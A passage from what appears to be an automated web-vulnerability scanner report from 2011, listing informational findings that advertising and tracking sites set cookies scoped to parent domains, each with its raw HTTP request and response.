15.87. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/?action=opt-out HTTP/1.1
Host: optout.33across.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 10:59:28 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.33across.com
Set-Cookie: 33x_nc=33Across+Optout; expires=Wed, 01-Sep-2021 10:59:28 GMT; path=/; domain=.33across.com
Location: http://optout.33across.com/api/?action=verify
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8


15.88. http://optout.adlegend.com/nai/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /nai/optout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout.php?action=setcookie HTTP/1.1
Host: optout.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=52-247451615

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:29:02 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sun, 24 Oct 2010 01:00:00 GMT
Set-Cookie: ID=OPT_OUT; expires=Fri, 02-Sep-2016 11:29:02 GMT; path=/; domain=.adlegend.com
Set-Cookie: PrefID=deleted; expires=Sat, 04-Sep-2010 11:29:01 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=deleted; expires=Sat, 04-Sep-2010 11:29:01 GMT; path=/; domain=.adlegend.com
Location: /nai/optout.php?action=readcookie
Content-Length: 0
Content-Type: text/html


15.89. http://optout.crwdcntrl.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:18:06 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:13 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


15.90. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/dclk/optoutnai.pl HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Redirect
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 208
Content-Type: text/html
Location: http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out
Server: Microsoft-IIS/6.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR FIN INT DEM STA POL HEA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: id=OPT_OUT; domain=.doubleclick.net; path=/; expires=Wednesday, 09-Nov-2030 23:59:00 GMT
Date: Sun, 04 Sep 2011 10:59:26 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&amp;state=opt_out">here</a
...[SNIP]...

15.91. http://optout.imiclk.com/cgi/optout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.imiclk.com
Path:   /cgi/optout.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/optout.cgi?nai=1&nocache=0.6761591 HTTP/1.1
Host: optout.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://optout.imiclk.com/cgi/nai_status.cgi?oo=1&rand=1315134760
Date: Sun, 04 Sep 2011 11:12:40 GMT
Connection: close
Set-Cookie: OL8U=0; expires=Wed, 01-Sep-2021 11:12:40 GMT; path=/; domain=imiclk.com
Set-Cookie: IMI=OPT_OUT; expires=Wed, 01-Sep-2021 11:12:40 GMT; path=/; domain=imiclk.com
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


15.92. http://optout.mookie1.decdna.net/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:35:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:35:57 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:35:57 GMT; path=/; domain=.decdna.net
Set-Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:35:58 GMT; path=/; domain=.decdna.net
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.93. http://optout.mookie1.decideinteractive.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decideinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:32:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:32:01 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:32:01 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:32:02 GMT; path=/; domain=.decideinteractive.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.94. http://optout.mookie1.pm14.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.pm14.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:36:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:36:38 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:36:38 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:36:39 GMT; path=/; domain=.pm14.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.95. http://optout.mxptint.net/naioptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naioptout.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /naioptout.ashx?nocache=0.322724 HTTP/1.1
Host: optout.mxptint.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:02 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
P3P: CP="NON CUR ADM DEVo PSAo PSDo OUR IND UNI COM NAV DEM STA PRE"
Location: /naicheck.ashx
Set-Cookie: mxpim=optout; domain=mxptint.net; expires=Mon, 04-Sep-2017 11:16:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fnaicheck.ashx">here</a>.</h2>
</body></html>

15.96. http://optout.xgraph.net/optout.gif.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.xgraph.net
Path:   /optout.gif.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.gif.jsp?nocache=0.2092745 HTTP/1.1
Host: optout.xgraph.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=3F312168868D0F0C318BF91F941ECF59; _xguid=F3DF262AFC62974063D1C62CA47B86ED

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: image/gif
Date: Sun, 04 Sep 2011 11:17:38 GMT
Location: http://optout.xgraph.net/optout.gif.jsp?check=1
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"
Server: nginx/1.0.4
Set-Cookie: XG_OPT_OUT=OPTOUT; Domain=.xgraph.net; Expires=Sun, 28-Aug-2039 11:17:38 GMT; Path=/
Content-Length: 0
Connection: keep-alive


15.97. http://p.brilig.com/contact/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/optout?nocache=0.2626812 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=5d4ee69c-99de-419c-8ef9-9d7e686b3586

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:13:23 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: BriligContact=OPT_OUT; Domain=.brilig.com; Expires=Tue, 27-Aug-2041 11:13:23 GMT
Set-Cookie: bbid=""; Domain=.brilig.com
Set-Cookie: bbid=""; Domain=p.brilig.com
Set-Cookie: BriligContact=OPT_OUT; Domain=p.brilig.com
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:13:23 GMT
Location: http://p.brilig.com/contact/isoptout?type=optout
X-Brilig-D: D=430
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


15.98. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?optout=$nai_optout$&nocache=0.6619356 HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app4.ny
Set-Cookie: anProfile=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anHistory=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCSC=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCnv=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anSt=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTRD=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTHS=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTD4=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: optout=0+0+0; Domain=.pro-market.net; Expires=Tue, 27-Aug-2041 10:59:25 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Location: http://pbid.pro-market.net/engine?optout=$nai_verify$
Content-Type: text/html
Content-Length: 0
Date: Sun, 04 Sep 2011 10:59:25 GMT
Connection: close


15.99. http://phoenix.untd.com/TRCK/RGST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phoenix.untd.com
Path:   /TRCK/RGST

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=214&TIME=720&RNS=2870ff57-7f1a-4f6a-b212-f02cd41820f6 HTTP/1.1
Host: phoenix.untd.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: WHRE=18E65_1:125D81_0_19135|125DC3_0_19094

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:59:20 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=18FC3_1:125D81_0_19293|125DC3_0_19094; expires=Wed, 01 Sep 2021 03:59:20 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

15.100. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Sun, 04 Sep 2011 04:17:57 GMT
Date: Sun, 04 Sep 2011 04:17:57 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: S=photos_html=bDORPcasEXlctOooifcnKQ; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

15.101. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?tt=js&pid=114&cgn=14613&seg=14790&random=0.8588666620198637 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:41 GMT
Server: 33XG08
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Mon, 03-Sep-2012 02:25:41 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: application/x-javascript
Content-Length: 298
Connection: close

(function(){try{if(!document.images){return;}var i,o,u=["http://ib.adnxs.com/mapuid?t=2&member=1001&user=9035684957&seg=166323&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%
...[SNIP]...

15.102. http://pixel.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?sgms=193 HTTP/1.1
Host: pixel.adblade.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: __sgs=Rkolm3H%2BdppOL6or2ytWhDZQNOeacHCu83vup2uIZ6Qwqy05SeMbjt01BACbO1t0xR6RxCZpl5RAOKhmEmgi8g%3D%3D; __esgs=UYx2FlkZNhD43QIFMYf0HRvSn3KklYp8Vni99f2%2BJtY%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: W3matter LLC | RevSense | http://www.w3matter.com
Set-Cookie: __sgs=C16GOfXVgnwIuGmLLu%2BZSQVJ55mp1tvSq34RVy%2BkrKMwqy05SeMbjt01BACbO1t0xR6RxCZpl5RAOKhmEmgi8g%3D%3D; expires=Mon, 03-Sep-2012 03:59:08 GMT; path=/; domain=.adblade.com
Content-type: image/gif;
Date: Sun, 04 Sep 2011 03:59:08 GMT
Server: lighttpd/1.4.21
Content-Length: 43

GIF89a.............!.......,...........D..;

15.103. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/optout?nocache=0.4589903 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315103291_34024:68324:1:0:0_34021:68285:1:6006:6006_34024:68283:2:6240:6332_34024:68292:2:125128:125210_34023:68293:1:125841:125841; kwd=1_1315103291; scg=1_1315103291; ppd=1_1315103291; act=1_1315103291; uid=1_1315103598_1314893682667:5756480826433243; eng=1_1315103598_34024:0

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:23:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: apd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cmp=1_1315135391_16771:241709; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315135391_34024:68324:1:32100:32100_34021:68285:1:38106:38106_34024:68283:2:38340:38432_34024:68292:2:157228:157310_34023:68293:1:157941:157941; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uat=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315135391_3984:241709:241709; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315135391_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: opt=; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 11:23:11 GMT; Path=/
Set-Cookie: ppd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
